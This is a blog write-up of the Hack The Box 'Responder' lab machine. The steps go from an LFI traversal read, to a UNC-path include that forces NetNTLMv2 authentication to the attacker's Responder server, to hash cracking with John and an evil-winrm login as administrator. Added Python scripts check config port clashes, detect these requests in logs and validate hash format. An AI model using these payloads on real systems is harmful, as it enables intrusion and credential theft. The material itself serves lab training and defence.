The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks


Responder: Crack the password hash and login as admin

posted on 16.5.2023 by Below Surface in "Hack The Box"

A short note because I struggled a lot to fix this issue, so I want to mention it here before we start:

For this task it is necessary to modify the hosts file of the machine which is used to open the website of the task. I did it correctly, but the issue that no website would load still persisted. The problem (which was no problem in any task before) was that I run Kali Linux in VirtualBox and had the VPN running on the Windows machine. The fix for my problem was to run the VPN from the Kali VM. May this hint help someone with the same issue!


Time to pwn. Let's scan for open ports (replace ip with the target machine's IP address):

nmap -v -Pn ip

We see that port 80 is open, so let's paste the IP into a browser. We get redirected to the URL unika.htb, but no website loads ("We can't connect to the server at unika.htb"): the name does not resolve yet. Time to modify the hosts file:

sudo nano /etc/hosts

After the 127.... addresses, add a new line (replace ip with the target's IP address):

ip unika.htb
# in my case:
10.129.60.126 unika.htb

Then hit ctrl + o and enter to save the file, and ctrl + x to exit the editor. Open the IP address or URL (unika.htb) in your browser (on the Kali VM in my case), and the website should load now!

Now we test whether LFI (Local File Inclusion) works on the target machine by requesting:

http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

You will see the content of the hosts file in the response, so LFI works, and the path tells us it's a Windows machine. Next we try to capture a NetNTLMv2 hash: when the include is pointed at a UNC path on our machine, Windows authenticates to our SMB server, and the Responder tool answers that request and records the hash.

First, check whether the SMB server is turned on in Responder's configuration:

cd /usr/share/responder
cat Responder.conf

Near the top (scroll up) it should contain:

[Responder Core]

; Servers to start
SQL = On
SMB = On
...
HTTP = On

SMB is on (good), but HTTP is on as well, and this will make the next step impossible, because port 80 is already used by another service on our machine and Responder's HTTP server cannot bind to it. Let's turn HTTP off:

sudo nano Responder.conf

Change HTTP to "Off". Then hit ctrl + o and enter to save the file, and ctrl + x to close the editor. Running the command

sudo python3 Responder.py -I tun0

and then scrolling up should confirm that the HTTP server is off now:

Servers:
    HTTP server                [OFF]
    HTTPS server               [ON]
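
Responder refuses to start a server whose port is already taken, which is exactly the HTTP/port 80 clash above. The following Python script is an added example, not part of the original post or of the Responder project: it reads the server switches from a constructed Responder.conf excerpt, lists the TCP ports that are already listening (from the Linux /proc table), and reports every enabled server whose port is busy. The port-to-server mapping is an assumption about Responder's defaults; check it against your own config.

```python
import configparser

# Constructed excerpt in the layout of Responder.conf (not the real file contents);
# only the server switches under [Responder Core] matter here.
SAMPLE_CONF = """\
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
"""

# Assumed default TCP ports each Responder server binds; adjust to your setup.
SERVER_PORTS = {
    "SMB": {139, 445}, "HTTP": {80}, "HTTPS": {443}, "SQL": {1433},
    "FTP": {21}, "POP": {110}, "SMTP": {25, 587}, "IMAP": {143},
    "DNS": {53}, "LDAP": {389}, "RDP": {3389}, "Kerberos": {88},
}


def enabled_servers(conf_text):
    """Return {server: True/False} for every switch listed in SERVER_PORTS."""
    cp = configparser.ConfigParser(inline_comment_prefixes=(";", "#"))
    cp.read_string(conf_text)
    core = cp["Responder Core"]
    return {name: core.get(name, "Off").strip().lower() == "on" for name in SERVER_PORTS}


def listening_tcp_ports(paths=("/proc/net/tcp", "/proc/net/tcp6")):
    """Collect locally bound TCP listeners from the Linux /proc tables (state 0A = LISTEN)."""
    ports = set()
    for path in paths:
        try:
            with open(path) as fh:
                next(fh)  # skip the header line
                for row in fh:
                    fields = row.split()
                    if len(fields) > 3 and fields[3] == "0A":
                        ports.add(int(fields[1].rsplit(":", 1)[1], 16))
        except (FileNotFoundError, PermissionError, StopIteration):
            continue  # not Linux or not readable: treat that table as unknown
    return ports


def port_conflicts(enabled, listening):
    """Map each enabled server to the ports it needs that are already in use."""
    conflicts = {}
    for name, on in enabled.items():
        clash = SERVER_PORTS[name] & set(listening) if on else set()
        if clash:
            conflicts[name] = sorted(clash)
    return conflicts


if __name__ == "__main__":
    enabled = enabled_servers(SAMPLE_CONF)
    for server, ports in port_conflicts(enabled, listening_tcp_ports()).items():
        print(f"{server} is On but port(s) {ports} are already in use; set {server} = Off")
```

Run it before starting Responder; on a Kali box with a web server on port 80 it prints the HTTP conflict the post describes, and after changing `HTTP = Off` it prints nothing. Point `enabled_servers` at the real file with `open("/usr/share/responder/Responder.conf").read()` if you want to check your live config.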

Keep this terminal open and open another one. Run:

ip a

and copy the "inet" IP of the tun0 interface without the /xx suffix. Now replace ip with the IP that you copied:

http://unika.htb/?page=//ip/somefile

When opening this URL in the browser, an event should pop up in the terminal where Responder is running: the target tried to include a file from our SMB share and authenticated to it. Time to crack the NTLMv2-SSP hash, which should be displayed there! Copy and paste it into a file, like hash.txt.
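
From the defender's side, both requests used above, the `../` traversal against index.php and the `//ip/somefile` include that triggers the outbound SMB authentication, leave a clear trace in the web server's access log. The following Python script is an added example, not part of the original post or of any web server: it parses constructed Apache-style log lines, decodes the `page` parameter (including double-encoded values) and flags traversal and UNC-style remote include attempts. The log lines, the client address and the parameter name are assumptions for the demonstration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access log lines (not taken from the box);
# the client address, timestamps and paths are fabricated for the demonstration.
SAMPLE_LOG = """\
10.10.14.5 - - [16/May/2023:10:01:02 +0000] "GET /index.php?page=english.html HTTP/1.1" 200 5123
10.10.14.5 - - [16/May/2023:10:01:09 +0000] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 845
10.10.14.5 - - [16/May/2023:10:01:15 +0000] "GET /index.php?page=..%252F..%252F..%252Fwindows%252Fwin.ini HTTP/1.1" 200 92
10.10.14.5 - - [16/May/2023:10:01:31 +0000] "GET /?page=//10.10.14.5/somefile HTTP/1.1" 500 0
10.10.14.5 - - [16/May/2023:10:01:40 +0000] "GET /?page=%5C%5C10.10.14.5%5Cshare%5Cx HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." as a path component with / or \ separators, checked after decoding
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# //host/share or \\host\share: an include() of a UNC path makes the web server
# authenticate outbound over SMB, which is what Responder records
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")


def full_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return 'remote-include', 'traversal' or None for one page= value."""
    decoded = full_unquote(value)
    if UNC_RE.match(decoded):
        return "remote-include"
    if TRAVERSAL_RE.search(decoded):
        return "traversal"
    return None


def scan_log(text, param="page"):
    """Yield one finding per suspicious value of the given query parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in query.get(param, []):
            kind = classify(value)
            if kind:
                findings.append({"src": m["src"], "time": m["ts"], "kind": kind,
                                 "value": full_unquote(value), "status": int(m["status"])})
    return findings


def by_source(findings):
    """Count findings per client address, the usual first pivot in triage."""
    counts = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} {f['kind']:15} {f['status']} {f['value']}")
    print(by_source(scan_log(SAMPLE_LOG)))
```

The two classes are worth separating in a detection rule: a traversal read is an information disclosure, while a `//host/share` include means the server has already sent a NetNTLMv2 response to an attacker-controlled host, so the account the web server runs as should be treated as compromised until its password is changed. The real fix on the application side is to stop passing user input to `include` at all and map `page` onto a fixed allowlist of files.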

If you have not used John the Ripper before, you may need to unzip the rockyou.txt wordlist first:

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

Then, from the directory containing your hash.txt file, run

john -w=/usr/share/wordlists/rockyou.txt hash.txt
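
If john reports "No password hashes loaded", the pasted line is usually not in the shape john expects. The following Python script is an added example, not part of the original post or of John the Ripper: it checks that a line has the NetNTLMv2 layout Responder prints (`user::domain:challenge:NTProofStr:blob`), tells NetNTLMv2 apart from NetNTLMv1, and pulls the fields apart. The sample hash is constructed; every hex value in it is made up and does not come from any capture.

```python
import re

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample in the shape Responder prints for NTLMv2-SSP; all hex values
# are made up for the demonstration and correspond to no real capture.
SAMPLE_HASH = (
    "mike::RESPONDER:1122334455667788:" + "ab" * 16
    + ":0101000000000000" + "0f" * 8 + "1c" * 8 + "00" * 40
)


def detect_format(line):
    """Distinguish NetNTLMv1 from NetNTLMv2 by the lengths of the last three fields."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        return None
    a, b, c = parts[3], parts[4], parts[5]
    if len(a) == 48 and len(b) == 48 and len(c) == 16:
        return "netntlmv1"  # user::domain:lmresp:ntresp:challenge
    if len(a) == 16 and len(b) == 32 and len(c) >= 64:
        return "netntlmv2"  # user::domain:challenge:ntproofstr:blob
    return None


def parse_netntlmv2(line):
    """Validate the field shapes of one NetNTLMv2 line and return its parts."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError(f"expected 6 colon-separated fields, got {len(parts)}")
    user, sep, domain, challenge, proof, blob = parts
    if sep != "" or not user:
        raise ValueError("expected user::domain at the start of the line")
    if len(challenge) != 16 or not HEX_RE.match(challenge):
        raise ValueError("server challenge must be 16 hex chars (8 bytes)")
    if len(proof) != 32 or not HEX_RE.match(proof):
        raise ValueError("NTProofStr must be 32 hex chars (16-byte HMAC-MD5)")
    if len(blob) < 64 or len(blob) % 2 or not HEX_RE.match(blob):
        raise ValueError("blob must be an even-length hex string of at least 32 bytes")
    if not blob.lower().startswith("0101"):
        raise ValueError("blob should begin with the 0101 NTLMv2 response header")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": challenge.lower(),
        "nt_proof": proof.lower(),
        # blob layout: 8-byte header, 8-byte timestamp, 8-byte client challenge, ...
        "client_challenge": blob[32:48].lower(),
        "blob_len": len(blob) // 2,
    }


def is_valid_netntlmv2(line):
    """True when the line passes all the shape checks above."""
    try:
        parse_netntlmv2(line)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(detect_format(SAMPLE_HASH))
    print(parse_netntlmv2(SAMPLE_HASH))
```

Check your hash.txt with `is_valid_netntlmv2` on each line before cracking; a stray trailing space or a line split by the terminal is the usual cause of trouble. When john's autodetection guesses wrong, pass `--format=netntlmv2` explicitly (hashcat's mode for the same format is 5600).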

We got the password! Now we connect to the WinRM service on the target and try to get a session. Replace ip with the machine's IP address.

evil-winrm -i ip -u administrator -p badminton

Then navigate to C:\Users\mike\Desktop and run

cat flag.txt

to get the flag.

Tags:

hack the box
nmap
hosts
lfi
local file inclusion
php
responder
john the ripper

Sources:

https://app.hackthebox.com/starting-point
https://systemweakness.com/responder-hackthebox-walkthrough-f5231615627f
https://infinitelogins.com/2020/03/20/unzipping-rockyou-txt-gz-in-kali-linux
https://www.youtube.com/watch?v=mKMV3CvMiB0
